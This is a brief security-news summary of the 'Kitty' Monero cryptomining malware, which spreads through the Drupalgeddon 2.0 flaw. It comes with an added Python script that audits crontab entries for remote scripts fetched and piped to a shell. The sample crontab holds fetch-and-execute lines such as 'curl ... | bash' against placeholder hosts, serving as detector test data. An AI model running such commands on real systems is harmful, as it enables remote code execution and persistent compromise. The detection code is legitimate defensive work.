The attack is a variant piggybacking on the Drupalgeddon 2.0 exploit, which targets a critical remote code execution (RCE) vulnerability.
Researchers at Imperva reported a new technique in the crypto-jacking attack trend. “During the inspection of the attacks blocked by our systems, we came across the ‘Kitty’ malware, an advanced Monero cryptocurrency miner, utilizing a ‘webminerpool,’ an open source mining software for browsers,” Imperva wrote.
Once executed, the Kitty script uses a backdoor independent of the Drupal vulnerability to establish control. A time-based job scheduler periodically re-downloads and executes a Bash script from a remote host so that the attacker can quickly make updates and changes to the infected servers.
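One way to hunt for the persistence pattern described above, as an added example that is not from Imperva's report or the original article: a Python check that flags scheduled jobs which fetch a remote script and hand it to a shell. It assumes the scheduler is cron; `audit_crontab`, the patterns and the sample crontab (hosts under `example.invalid`) are constructed for illustration.

```python
import re

# Constructed sample crontab (not taken from the Kitty campaign); hosts are placeholders.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
MAILTO=root
0 3 * * * /usr/local/bin/backup.sh --target /srv/backup
30 2 * * * curl -fsS -o /var/cache/list.json https://feeds.example.invalid/list.json
*/5 * * * * curl -fsSL http://updates.example.invalid/k.sh | bash
*/10 * * * * www-data wget -q http://cdn.example.invalid/k.sh -O /tmp/k.sh && bash /tmp/k.sh
15 4 * * * curl -s https://mirror.example.invalid/pkg.tgz | sha256sum
"""

# A schedule is either an @keyword (@reboot, @hourly, ...) or five time fields.
SCHEDULE = re.compile(r"^(@\w+|(?:\S+\s+){4}\S+)\s+(.*)$")
ENV_LINE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*\s*=")
# A download tool followed, within the same simple command, by a remote URL.
FETCH = re.compile(r"\b(?:curl|wget|fetch)\b[^|;&]*?(?:https?|ftp)://[^\s'\"|;&]+")
# Output piped straight into a shell interpreter ("| bash", "| /bin/sh").
PIPE_TO_SHELL = re.compile(r"\|\s*(?:sudo\s+)?(?:/\S*/)?(?:ba|da|z|k)?sh\b")
# A shell started on a file after a separator ("&& bash /tmp/x.sh").
RUN_SHELL = re.compile(r"(?:^|[;&|]\s*)(?:/\S*/)?(?:ba)?sh\s+\S+")


def audit_crontab(text):
    """Return (line_no, schedule, command, reason) for entries that fetch and run remote code."""
    findings = []
    for line_no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or ENV_LINE.match(line):
            continue  # blank line, comment, or environment assignment
        entry = SCHEDULE.match(line)
        if not entry or not FETCH.search(entry.group(2)):
            continue  # not a job, or the job downloads nothing
        schedule, command = entry.groups()
        if PIPE_TO_SHELL.search(command):
            reason = "download piped to shell"
        elif RUN_SHELL.search(command):
            reason = "download then shell execution"
        else:
            continue  # fetch only (e.g. saved to a file or checksummed)
        findings.append((line_no, schedule, command, reason))
    return findings


if __name__ == "__main__":
    for line_no, schedule, command, reason in audit_crontab(SAMPLE_CRONTAB):
        print(f"line {line_no} [{schedule}] {reason}: {command}")
```

The check covers only these two command shapes; a job that downloads a file, marks it executable and runs it directly would need an additional pattern.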
Read entire article Cyrpto-Me0wing, Not a Cute Kitty of the Internet | InfoSecurity